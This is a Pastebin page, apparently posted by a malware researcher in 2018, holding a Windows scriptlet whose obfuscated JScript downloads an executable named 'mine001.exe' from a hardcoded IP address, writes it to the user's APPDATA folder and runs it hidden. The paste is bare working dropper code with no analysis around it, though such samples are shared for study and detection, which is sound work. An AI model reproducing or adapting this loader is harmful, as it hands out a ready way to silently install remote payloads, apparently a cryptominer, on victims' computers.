Advertisement
James_inthe_box

Embedded

Feb 22nd, 2018
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.65 KB | None | 0 0
  1. <scriptlet>
  2. <registration
  3. description="DJvc.WRFN"
  4. progid="DJvc.WRFN"
  5. version="1"
  6. classid="{2d820bbe-27f3-4b4f-b13f-a02e01235209}"
  7. remotable="true"
  8. >
  9. </registration>
  10. <script language="JScript">
  11. <![CDATA[
  12. var SzA = ["WScript.Shell","Word.Application","ADODB.Stream","Scripting.FileSystemObject","http://192.189.25.17/hold/mine001.exe","mine001.exe","MSXML2.XMLHTTP"];
  13. var MZhNFjyj = XmjCSYX(0);
  14. mRioojVLeIcc= fsXGSqFmBVnmU("APPDATA") + "\\" + SzA[5];
  15. var YeTQgXBuaMnkQQ = XmjCSYX(3);
  16. try{
  17. var YeTQgXBuaMnkQQ = XmjCSYX(3);
  18. if (YeTQgXBuaMnkQQ.FileExists(mRioojVLeIcc)){
  19. YeTQgXBuaMnkQQ.DeleteFile(mRioojVLeIcc);
  20. }
  21. } catch (e) {
  22. }
  23. kITCbMeQMuhUePP(SzA[4],mRioojVLeIcc);
  24. MZhNFjyj.Run(mRioojVLeIcc, 0, false);
  25.  
  26. function XmjCSYX(mRioojVLeIcc) {
  27. return new ActiveXObject(SzA[mRioojVLeIcc]);
  28. }
  29. function fsXGSqFmBVnmU(mRioojVLeIcc) {
  30. return MZhNFjyj.ExpandEnvironmentStrings("%" + mRioojVLeIcc + "%");
  31. }
  32. function kITCbMeQMuhUePP(xuibjYzhQqVMCMep, mRioojVLeIcc ) {
  33. var owCyXhujvqCZsGyWP = XmjCSYX(6);
  34. owCyXhujvqCZsGyWP.onreadystatechange=function() {
  35. if (owCyXhujvqCZsGyWP.readyState === 4) {
  36. var iVjFGNkdPORwjCelyYg = XmjCSYX(2);
  37. iVjFGNkdPORwjCelyYg.open();
  38. iVjFGNkdPORwjCelyYg.type = 1;
  39. iVjFGNkdPORwjCelyYg.write(owCyXhujvqCZsGyWP.ResponseBody);
  40. iVjFGNkdPORwjCelyYg.position = 0;
  41. iVjFGNkdPORwjCelyYg.saveToFile(mRioojVLeIcc, 2);
  42. iVjFGNkdPORwjCelyYg.close();
  43. }
  44. };
  45. owCyXhujvqCZsGyWP.open("GET", xuibjYzhQqVMCMep, false);
  46. owCyXhujvqCZsGyWP.send();
  47. }
  48. ]]>
  49. </script>
  50. </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement